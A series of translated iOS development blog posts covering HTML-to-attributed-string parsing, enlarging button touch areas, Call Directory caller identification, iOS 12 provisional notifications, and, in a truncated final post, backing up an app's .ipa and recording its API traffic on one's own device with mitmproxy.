Applying the logic of Strip, we can combine the parsed structure by knowing the current Tag from elementName
and applying the corresponding Tag Parser and defined Style.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+
let test = "我<br/><a href=\"http://google.com\">同意</a>提供<b><i>個</i>人</b>身分證字號/護照/居留<span style=\"color:#FF0000;font-size:20px;word-spacing:10px;line-height:10px\">證號碼</span>,以供<i>跨境物流</i>方通關<span style=\"background-color:#00FF00;\">使用</span>,並已<img src=\"g.png\"/>了解跨境<br/>商品之物<p>流需</p>求"
+let render = HTMLToAttributedStringParser(defaultStyle: DefaultTextStyle())
+render.register(ATagParser())
+render.register(BoldTagParser())
+render.register(SpanTagParser())
+//...
+print(try! render.parse(string: test))
+
+// Result:
+// 我{
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// }同意{
+// NSColor = "UIExtendedSRGBColorSpace 0 0 1 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSLink = "http://google.com";
+// NSUnderline = 1;
+// }提供{
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// }個{
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Bold 14.00 pt. P [] (0x13a013870) fobj=0x13a013870, spc=3.46\"";
+// NSUnderline = 1;
+// }人身分證字號/護照/居留{
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// }證號碼{
+// NSColor = "UIExtendedSRGBColorSpace 1 0 0 1";
+// NSFont = "\".SFNS-Regular 20.00 pt. P [] (0x13a015fa0) fobj=0x13a015fa0, spc=4.82\"";
+// NSKern = 10;
+// NSParagraphStyle = "Alignment 4, LineSpacing 10, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// },以供跨境物流方通關{
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// }使用{
+// NSBackgroundColor = "UIExtendedSRGBColorSpace 0 1 0 1";
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// },並已了解跨境商品之物流需求{
+// NSColor = "UIExtendedGrayColorSpace 0 1";
+// NSFont = "\".SFNS-Regular 14.00 pt. P [] (0x13a012970) fobj=0x13a012970, spc=3.79\"";
+// NSParagraphStyle = "Alignment 4, LineSpacing 3, ParagraphSpacing 0, ParagraphSpacingBefore 0, HeadIndent 0, TailIndent 0, FirstLineHeadIndent 0, LineHeight 0/0, LineHeightMultiple 0, LineBreakMode 0, Tabs (\n 28L,\n 56L,\n 84L,\n 112L,\n 140L,\n 168L,\n 196L,\n 224L,\n 252L,\n 280L,\n 308L,\n 336L\n), DefaultTabInterval 0, Blocks (\n), Lists (\n), BaseWritingDirection -1, HyphenationFactor 0, TighteningForTruncation NO, HeaderLevel 0 LineBreakStrategy 0 PresentationIntents (\n) ListIntentOrdinal 0 CodeBlockIntentLanguageHint ''";
+// }
+
Display Result:
We have now completed implementing the HTML Render function through XMLParser, maintaining both extensibility and specification. This allows us to manage and understand the types of string rendering supported by the current App from the code.
This article is also published on my personal Blog: [Click here to visit].
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Rewrite pointInside to expand the touch area
In daily development, it is often encountered that after arranging the UI according to the design, the screen looks beautiful, but the actual operation shows that the button’s touch area is too small, making it difficult to click accurately; especially unfriendly to people with thick fingers.
Completed Example
Initially, I didn’t delve deeply into this issue and directly overlaid a larger transparent UIButton on the original button, using this transparent button to respond to events. This approach was very cumbersome and difficult to control when there were many components.
Later, I solved it by layout, setting the button to align 0 (or lower) on all sides during layout, and then controlling the imageEdgeInsets
, titleEdgeInsets
, and contentEdgeInsets
parameters to push the Icon/button title to the correct position in the UI design. However, this method is more suitable for projects using Storyboard/xib because you can directly push the layout in Interface Builder. Additionally, the designed Icon should ideally have no spacing, otherwise, it will be difficult to align, sometimes stuck at that 0.5 distance, no matter how you adjust it, it won’t align.
As the saying goes, “seeing more broadens the mind.” Recently, after encountering a new project, I learned a small trick; you can increase the event response range in UIButton’s pointInside. By default, it is UIButton’s Bounds, but we can extend the Bounds size inside to make the button’s clickable area larger!
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
class MyButton: UIButton {
+ var touchEdgeInsets:UIEdgeInsets?
+ override open func point(inside point: CGPoint, with event: UIEvent?) -> Bool {
+ var frame = self.bounds
+
+ if let touchEdgeInsets = self.touchEdgeInsets {
+ frame = frame.inset(by: touchEdgeInsets)
+ }
+
+ return frame.contains(point);
+ }
+}
+
Customize a UIButton, adding the touchEdgeInsets
public property to store the range to be expanded, making it convenient for us to use; then override the pointInside method to implement the above idea.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
import UIKit
+
+class MusicViewController: UIViewController {
+
+ @IBOutlet weak var playerButton: MyButton!
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ playerButton.touchEdgeInsets = UIEdgeInsets(top: -10, left: -10, bottom: -10, right: -10)
+ }
+
+}
+
Play Button/Blue is the original click area/Red is the expanded click area
When using, just remember to set the Button’s Class to our custom MyButton, and then you can expand the click area for individual Buttons by setting touchEdgeInsets
!
️⚠️⚠️⚠️⚠️️️️⚠️️️️
When using Storyboard/xib, remember to set
Custom Class
to MyButton
⚠️⚠️⚠️⚠️⚠️
touchEdgeInsets
extends outward from the center of (0,0) itself, so the distances for top, bottom, left, and right should be negative numbers.
Replacing every UIButton with a custom MyButton is quite cumbersome and increases the complexity of the program. It might even cause conflicts in large projects.
For functionalities that we believe all UIButtons should inherently have, if possible, we would prefer to directly extend the original UIButton:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
private var buttonTouchEdgeInsets: UIEdgeInsets?
+
+extension UIButton {
+ var touchEdgeInsets:UIEdgeInsets? {
+ get {
+ return objc_getAssociatedObject(self, &buttonTouchEdgeInsets) as? UIEdgeInsets
+ }
+
+ set {
+ objc_setAssociatedObject(self,
+ &buttonTouchEdgeInsets, newValue,
+ .OBJC_ASSOCIATION_RETAIN_NONATOMIC)
+ }
+ }
+
+ override open func point(inside point: CGPoint, with event: UIEvent?) -> Bool {
+ var frame = self.bounds
+
+ if let touchEdgeInsets = self.touchEdgeInsets {
+ frame = frame.inset(by: touchEdgeInsets)
+ }
+
+ return frame.contains(point);
+ }
+}
+
Use it as described in the previous usage example.
Since Extensions cannot contain properties or it will cause a compilation error “Extensions must not contain stored properties”, we refer to Using Property with Associated Object to associate the external variable buttonTouchEdgeInsets
with our Extension, allowing it to be used like a regular property. (For detailed principles, please refer to Mao Da’s article )
For image clicks, we add a Tap gesture to the View; Similarly, we can achieve the same effect by overriding UIImageView’s pointInside.
Done! After continuous improvements, solving this issue has become much simpler and more convenient!
UIView Change Touch Range (Objective-C)
Around the same time last year, I wanted to start a small category “ Small things make big things “ to record the trivial daily development tasks. These small tasks, when accumulated, can significantly improve the overall APP experience or the program itself. However, after a year, I only added one more article <( _ _ )>. Small tasks are really easy to forget to record!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
iOS DIY Whoscall Call Identification and Phone Number Tagging Features
I have always been a loyal user of Whoscall. I used it when I originally had an Android phone, and it could display unknown caller information very promptly, allowing me to decide whether to answer the call immediately. Later, I switched to the Apple camp, and my first Apple phone was the iPhone 6 (iOS 9). At that time, using Whoscall was very awkward; it couldn’t identify calls in real-time, and I had to copy the phone number to the app for inquiry. Later, Whoscall provided a service to install the unknown phone number database locally on the phone, which solved the real-time identification problem but easily messed up my phone contacts!
Until iOS 10+ when Apple opened the call identification feature (Call Directory Extension) permissions to developers, Whoscall’s experience at least matched the Android version, if not surpassed it (the Android version has a lot of ads, but from a developer’s standpoint, it’s understandable).
Call Directory Extension can do what?
“Settings” -> “Phone” -> “Call Blocking & Identification”
The calls made by users are all representative numbers of the transfer center (#extension), and they will not know the real phone number; on one hand, it protects personal privacy, and on the other hand, it allows us to know how many people contacted the store (evaluate effectiveness) and even know where they saw it before calling (e.g., webpage shows #1234, app shows #5678). It also allows us to offer free services by absorbing the phone communication costs.
However, this approach brings an unavoidable problem: messy phone numbers. It is impossible to identify who the call is for or when the store calls back, the user does not know who the caller is. Using the call identification feature can greatly solve this problem and improve the user experience!
You can see that when entering the phone number, the recognition result can be directly displayed during the call, and the call history list is no longer messy and can display the recognition result at the bottom.
Let’s start working!
Xcode -> File -> New -> Target
Select Call Directory Extension
Enter Extension Name
Optionally add Scheme for easier Debugging
A folder and program for Call Directory Extension will appear under the directory
First, return to the main iOS project
The first question is how do we determine if the user’s device supports Call Directory Extension or if the “Call Blocking & Identification” in the settings is turned on:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
import CallKit
+//
+//......
+//
+if #available(iOS 10.0, *) {
+ CXCallDirectoryManager.sharedInstance.getEnabledStatusForExtension(withIdentifier: "Enter the bundle identifier of the call directory extension here", completionHandler: { (status, error) in
+ if status == .enabled {
+ //Enabled
+ } else if status == .disabled {
+ //Disabled
+ } else {
+ //Unknown, not supported
+ }
+ })
+}
+
As mentioned earlier, the way call recognition works is to maintain a local recognition database; so how do we achieve this function?
Unfortunately, you cannot directly call and write data to the Call Directory Extension, so you need to maintain an additional corresponding structure, and then the Call Directory Extension will read your structure and write it into the recognition database. The process is as follows:
This means we need to maintain our own database file, and then let the Extension read and write it into the phone
So what should the recognition data/file look like?
It is actually a Dictionary structure, such as: [“Phone”:”Wang Da Ming”]
The local file can use some Local DB (but the Extension must also be able to install and use it). Here, a .json file is directly stored on the phone; It is not recommended to store it directly in UserDefaults. If it is for testing or very little data, it is okay, but it is strongly not recommended for actual applications!
Okay, let’s start:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
if #available(iOS 10.0, *) {
+ if let dir = FileManager.default.containerURL(forSecurityApplicationGroupIdentifier: "Your cross-Extension, Group Identifier name") {
+ let fileURL = dir.appendingPathComponent("phoneIdentity.json")
+ var datas:[String:String] = ["8869190001234":"Mr. Li","886912002456":"Handsome"]
+ if let content = try? String(contentsOf: fileURL, encoding: .utf8),let text = content.data(using: .utf8),let json2 = try? JSONSerialization.jsonObject(with: text, options: .mutableContainers) as? Dictionary<String,String>,let json = json2 {
+ datas = json
+ }
+ if let data = jsonToData(jsonDic: datas) {
+ DispatchQueue(label: "phoneIdentity").async {
+ if let _ = try? data.write(to: fileURL) {
+ //Writing json file completed
+ }
+ }
+ }
+ }
+}
+
Just general local file maintenance, note that the directory needs to be readable by the Extension as well.
1
+2
+3
+4
+5
+6
+7
+
var newNumber = "0255667788,0718"
+if let regex = try? NSRegularExpression(pattern: "^0{1}") {
+ newNumber = regex.stringByReplacingMatches(in: newNumber, options: [], range: NSRange(location: 0, length: newNumber.count), withTemplate: "886")
+}
+if let regex = try? NSRegularExpression(pattern: ",") {
+ newNumber = regex.stringByReplacingMatches(in: newNumber, options: [], range: NSRange(location: 0, length: newNumber.count), withTemplate: "")
+}
+
Next, as per the process, once the identification data is maintained, you need to notify the Call Directory Extension to refresh the data on the phone:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+
if #available(iOS 10.0, *) {
+ CXCallDirectoryManager.sharedInstance.reloadExtension(withIdentifier: "tw.com.marry.MarryiOS.CallDirectory") { errorOrNil in
+ if let error = errorOrNil as? CXErrorCodeCallDirectoryManagerError {
+ print("reload failed")
+
+ switch error.code {
+ case .unknown:
+ print("error is unknown")
+ case .noExtensionFound:
+ print("error is noExtensionFound")
+ case .loadingInterrupted:
+ print("error is loadingInterrupted")
+ case .entriesOutOfOrder:
+ print("error is entriesOutOfOrder")
+ case .duplicateEntries:
+ print("error is duplicateEntries")
+ case .maximumEntriesExceeded:
+ print("maximumEntriesExceeded")
+ case .extensionDisabled:
+ print("extensionDisabled")
+ case .currentlyLoading:
+ print("currentlyLoading")
+ case .unexpectedIncrementalRemoval:
+ print("unexpectedIncrementalRemoval")
+ }
+ } else if let error = errorOrNil {
+ print("reload error: \(error)")
+ } else {
+ print("reload succeeded")
+ }
+ }
+}
+
Use the above method to notify the Extension to refresh and obtain the execution result. (At this time, the beginRequest in the Call Directory Extension will be called, please continue reading)
The main iOS project code ends here!
Open the Call Directory Extension directory and find the file CallDirectoryHandler.swift that has been created for you.
The only method that can be implemented is beginRequest for handling actions when processing phone data. The default examples are already set up for us, so there’s not much need to change them:
We just need to complete the implementation of the above functions. The principles for blacklist functionality and caller identification are the same, so they won’t be introduced in detail here.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+
private func fetchAll(context: CXCallDirectoryExtensionContext) {
+ if let dir = FileManager.default.containerURL(forSecurityApplicationGroupIdentifier: "Your App Group Identifier") {
+ let fileURL = dir.appendingPathComponent("phoneIdentity.json")
+ if let content = try? String(contentsOf: fileURL, encoding: .utf8), let text = content.data(using: .utf8), let numbers = try? JSONSerialization.jsonObject(with: text, options: .mutableContainers) as? Dictionary<String, String> {
+ numbers?.sorted(by: { (Int($0.key) ?? 0) < Int($1.key) ?? 0 }).forEach({ (obj) in
+ if let number = CXCallDirectoryPhoneNumber(obj.key) {
+ autoreleasepool {
+ if context.isIncremental {
+ context.removeIdentificationEntry(withPhoneNumber: number)
+ }
+ context.addIdentificationEntry(withNextSequentialPhoneNumber: number, label: obj.value)
+ }
+ }
+ })
+ }
+ }
+}
+
+private func addAllIdentificationPhoneNumbers(to context: CXCallDirectoryExtensionContext) {
+ // Retrieve phone numbers to identify and their identification labels from data store. For optimal performance and memory usage when there are many phone numbers,
+ // consider only loading a subset of numbers at a given time and using autorelease pool(s) to release objects allocated during each batch of numbers which are loaded.
+ //
+ // Numbers must be provided in numerically ascending order.
+ // let allPhoneNumbers: [CXCallDirectoryPhoneNumber] = [ 1_877_555_5555, 1_888_555_5555 ]
+ // let labels = [ "Telemarketer", "Local business" ]
+ //
+ // for (phoneNumber, label) in zip(allPhoneNumbers, labels) {
+ // context.addIdentificationEntry(withNextSequentialPhoneNumber: phoneNumber, label: label)
+ // }
+ fetchAll(context: context)
+}
+
+private func addOrRemoveIncrementalIdentificationPhoneNumbers(to context: CXCallDirectoryExtensionContext) {
+ // Retrieve any changes to the set of phone numbers to identify (and their identification labels) from data store. For optimal performance and memory usage when there are many phone numbers,
+ // consider only loading a subset of numbers at a given time and using autorelease pool(s) to release objects allocated during each batch of numbers which are loaded.
+ // let phoneNumbersToAdd: [CXCallDirectoryPhoneNumber] = [ 1_408_555_5678 ]
+ // let labelsToAdd = [ "New local business" ]
+ //
+ // for (phoneNumber, label) in zip(phoneNumbersToAdd, labelsToAdd) {
+ // context.addIdentificationEntry(withNextSequentialPhoneNumber: phoneNumber, label: label)
+ // }
+ //
+ // let phoneNumbersToRemove: [CXCallDirectoryPhoneNumber] = [ 1_888_555_5555 ]
+ //
+ // for phoneNumber in phoneNumbersToRemove {
+ // context.removeIdentificationEntry(withPhoneNumber: phoneNumber)
+ // }
+
+ //context.removeIdentificationEntry(withPhoneNumber: CXCallDirectoryPhoneNumber("886277283610")!)
+ //context.addIdentificationEntry(withNextSequentialPhoneNumber: CXCallDirectoryPhoneNumber("886277283610")!, label: "TEST")
+
+ fetchAll(context: context)
+ // Record the most-recently loaded set of identification entries in data store for the next incremental load...
+}
+
Because the data on my site is not too much and my local data structure is quite simple, it is not possible to do incremental updates; therefore, we will use the method of completely adding new data. If using the incremental method, you must delete the old data first (this step is very important, otherwise reloading the extension will fail!).
That’s it! The implementation is very simple!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Introduction to UserNotifications Provisional Authorization and iOS 12 Silent Notifications
Recently, I was improving the low permission and click-through rates of APP push notifications and made some optimizations. The initial version had a very poor experience; as soon as the APP was installed and launched, it directly popped up a window asking “APP wants to send notifications.” Naturally, the rejection rate was very high. According to the statistics from the previous article using Notification Service Extension, it is estimated that only about 10% of users allowed push notifications.
Currently, the new installation guide process has been adjusted, and the timing of the notification permission window has been optimized as follows:
If the user is still hesitant or wants to try the APP before deciding whether to receive notifications, they can click “Skip” in the upper right corner to avoid the irreversible result of pressing “Don’t Allow” due to unfamiliarity with the APP at the beginning.
While working on the above optimization, I discovered that UserNotifications in iOS 12 added a new .provisional permission. In plain language, it is a temporary notification permission that allows sending push notifications (silent notifications) to users without popping up a notification permission window. Let’s see the actual effect and limitations.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
if #available(iOS 12.0, *) {
+ let center = UNUserNotificationCenter.current()
+ let permissions: UNAuthorizationOptions = [.badge, .alert, .sound, .provisional]
+ // You can request only provisional permission .provisional, or request all necessary permissions at once XD
+ // It will not trigger the notification permission window
+
+ center.requestAuthorization(options: permissions) { (granted, error) in
+ print(granted)
+ }
+}
+
We add the above code to AppDelegate didFinishLaunchingWithOptions and then open the APP. We will find that the notification permission window does not pop up. At this time, we go to Settings to check APP Notification Settings.
(Figure 1) Obtaining Silent Notification Permission
We have quietly obtained the silent notification permission 🏆
In the code, add the authorizationStatus .provisional item (only for iOS 12 and later) to determine the current push notification permission:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
if #available(iOS 10.0, *) {
+ UNUserNotificationCenter.current().getNotificationSettings { (settings) in
+ if settings.authorizationStatus == .authorized {
+ // Allowed
+ } else if settings.authorizationStatus == .denied {
+ // Not allowed
+ } else if settings.authorizationStatus == .notDetermined {
+ // Not asked yet
+ } else if #available(iOS 12.0, *) {
+ if settings.authorizationStatus == .provisional {
+ // Currently provisional permission
+ }
+ }
+ }
+}
+
Note! If you are checking the current notification permission status,
settings.authorizationStatus == .notDetermined
andsettings.authorizationStatus == .provisional
can both trigger a notification prompt asking the user whether to allow notifications.
Let’s start with a diagram summarizing when silent notifications will be displayed:
As you can see, if it is a silent push notification, when the app is in the background state, the notification will not show a banner, will not have a sound alert, cannot be marked, and will not appear on the lock screen. It will only appear in the notification center when the phone is unlocked:
You can see the push notifications you sent, and they will automatically aggregate into a category.
After clicking to expand, the user can choose:
This expanded prompt window will only appear under silent push with “provisional permission.”
Silent notifications are a new setting introduced with iOS 12 for notification optimization and are unrelated to provisional permissions. It’s just that the program can send silent notifications when it gets provisional permissions. Setting an app’s notifications to silent is also very simple. One method is to go to “Settings” - “Notifications” - find the app and turn off all permissions except “Notification Center” (as shown in the first image), which is silent notifications. Or, when receiving an app notification, press/long press to expand, then click the top right “…” and choose to send silent notifications:
Remove the .provisional
part when requesting notification permissions to still normally ask the user whether to allow notifications:
1
+2
+3
+4
+5
+6
+7
+
if #available(iOS 10.0, *) {
+ let center = UNUserNotificationCenter.current()
+ let permissions: UNAuthorizationOptions = [.badge, .alert, .sound]
+ center.requestAuthorization(options: permissions) { (granted, error) in
+ print(granted)
+ }
+}
+
Press “Allow” to get all notification permissions, press “Don’t Allow” to turn off all notification permissions (including the previously obtained silent notification permissions).
This thoughtful notification optimization in iOS 12 makes it easier to build an interactive bridge between users and developers regarding notification functionality, minimizing the chances of notifications being permanently turned off.
For users, when the notification prompt window pops up, they often don’t know whether to press allow or deny because they don’t know what kind of notifications the developer will send. It could be ads or important messages. The unknown is scary, so most people will conservatively press deny.
For developers, we have carefully prepared many items, including important messages to push to users, but due to the above issue, users block them, and our thoughtfully designed copy goes to waste!
This feature allows developers to seize the opportunity when users first install the app, design the push process and content well, prioritize pushing items of interest to users, increase users’ awareness of the app’s notifications, and track push click rates, then trigger the prompt asking users whether to allow notifications at the right time.
Although the only exposure is in the Notification Center, having exposure means having a chance. From another perspective, if we were users and didn’t allow notifications, and the app could still send a bunch of notifications with banners, sounds, and appearing on the unlock screen, it would be very annoying (like the other camp XD). Apple’s approach strikes a balance between users and developers.
The current issue is probably… there are still too few iOS 12 users 🤐
In practice, I have “canceled” the implementation of this feature.
Why?
Because it was found that users would passively enter silent push notification mode in the following situations, they need to manually turn on all push notification permissions (banners, sounds, badges).
It’s a bit awkward, which means that if the user denies notification permissions when asked and then turns them on in settings, only silent notification permissions will be enabled. Asking the user to turn on banners, sounds, and badges below is a bit difficult, so for now, it has been temporarily disabled.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Using mitmproxy + apple configurator to keep an App in its pre-removal state forever
Jujutsu Kaisen
After working for a long time and handling many products, I have started to encounter products that I once participated in reaching their end (removal). Developing a product from scratch is like nurturing a new life, with the team working together for 3-4 months to bring the child into the world. Although it was later handed over to other caretakers (engineers) for further development, hearing that it is about to reach the end of its product lifecycle still brings some regret.
Life is like this too. We never know if the sun will rise first tomorrow or if an accident will happen. The only thing we can do is cherish the present and do things well.
Every step leaves a trace. We hope to do something before the product reaches its end so that everyone still has a chance to remember it and at least leave proof of its existence. The following methods require the App to still be online; if it has already been removed, then only memories remain.
Besides using the iPhone’s built-in screen recording feature, we can also use QuickTime Player to connect the phone to a Mac for recording and exporting videos.
Click the “🔴” to start recording, and operate the content you want to record on the phone.
During recording, the current video size will be displayed. To stop recording, press the “🔴” again.
You can use the QuickTime Player toolbar to simply trim the video. Finally, press “Command” + “s” to export and save the video to the specified location, completing the recording for commemoration.
The advantage of video commemoration is that future memories are more easily connected than with pictures. The deeper you record, the more detailed the record. If you want to convert specific frames into pictures, you can directly take screenshots, which is very convenient.
Technical backup of an App can be divided into two directions: “bones” and “meat”. The App itself is just a skeleton, while the core content data of the App is composed of API Response Data.
Therefore, we also divide the technical backup into bones and meat.
This article is for technical research and sharing only. It does not encourage the use of any technology for illegal or infringing activities.
After an App is removed from the store, as long as the downloaded App is not actively deleted from the phone, it will always exist on that phone. If you change phones using the transfer method, it will also be transferred.
But if we accidentally delete the App or change phones without transferring it, then it will be gone forever. At this time, if we manually back up the .ipa file from the store, we can extend its life again.
A long time ago, the reverse engineering article mentioned this, but this time we only need to back up the .ipa file without jailbreaking, all using tools provided by Apple.
1. Install Apple Configurator 2
First, go to the Mac App Store to download and install Apple Configurator 2.
2. Connect iPhone to Mac and click Trust This Computer
Once connected successfully, the iPhone’s home screen will appear.
3. Ensure your phone has the app installed that you want to back up the .ipa file for
We need to use Apple Configurator 2 to get the .ipa file downloaded to the cache, so we need to make sure the target app is installed on the phone.
4. Go back to Apple Configurator 2 on the Mac
Double-click the iPhone home screen shown above to enter the information page.
Switch to “App” -> top right corner “+ Add” -> “App”
After logging into the App Store account, you can get a list of apps you have purchased before.
Search for the target app you want to back up, select it, and click “Add”.
A waiting window will appear, adding the app on XXX, downloading “XXX”.
5. Extract the .ipa file
Wait for it to finish downloading, a window will pop up asking if you want to replace the existing installed app.
Do not click anything at this time. Do not click anything at this time. Do not click anything at this time.
Open a Finder:
Select “Go” -> “Go to Folder” from the top left toolbar
Paste the following path:
1
+
~/Library/Group Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps
+
You can find the target app .ipa file that is downloaded and ready to be installed:
Copy it out to complete the app .ipa file backup.
After completing the file copy, go back to Apple Configurator 2 and click stop to terminate the operation.
Similarly, connect the phone to be restored to the Mac and open Apple Configurator 2, enter the app addition interface.
For restoration, select “Choose from my Mac…” in the bottom left corner.
Select the backed-up app .ipa file and click “Add”.
Wait for the transfer and installation to complete, then you can reopen the app on your phone, successfully revived!
Here we will use the method and open-source project mentioned in the previous App End-to-End Testing Local Snapshot API Mock Server article (refer to the details and principles).
With the same technique used for recording API Request & Response for E2E Testing, we can also use it to record the last API Request & Response Data before an app is taken down or shut down.
1. Install mitmproxy
1
+
brew install mitmproxy
+
mitmproxy is an open-source man-in-the-middle attack and network request sniffing tool.
If you are not familiar with the working principle of Mitmproxy man-in-the-middle attacks, you can refer to my previous article: “The APP uses HTTPS transmission, but the data was still stolen.” or the Mitmproxy official documentation.
If you are using it purely for network request sniffing and are not comfortable with the mitmproxy interface, you can also use “Proxyman” as referenced in another previous article.
2. Complete mitmproxy certificate setup
For HTTPS encrypted connections, we need to use a root certificate swap to perform a man-in-the-middle attack. Therefore, the first time you use it, you need to complete the root certificate download and activation on the mobile end.
*If your App & API Server has implemented SSL Pinning, you also need to add the Pinning certificate to mitmproxy.
Start mitmproxy
or mitmweb
(Web GUI version) in Terminal.
1
+
mitmproxy
+
Seeing this screen means the mitmproxy service has started, and there is no traffic coming in, so it is empty. Keep this screen open and do not close the Terminal.
Go back to the phone’s WiFi settings, click “i” to enter detailed settings, and find “Configure Proxy” at the bottom:
Open Safari on the phone and enter: http://mitm.it/
If it shows:
1
+
If you can see this, traffic is not passing through mitmproxy.
+
It means the network proxy server on the phone was not set up successfully, or mitmproxy
was not started on the Mac.
Under normal circumstances, it will show:
At this point, only HTTP traffic can be sniffed, and HTTPS traffic will report an error. We will continue to set it up.
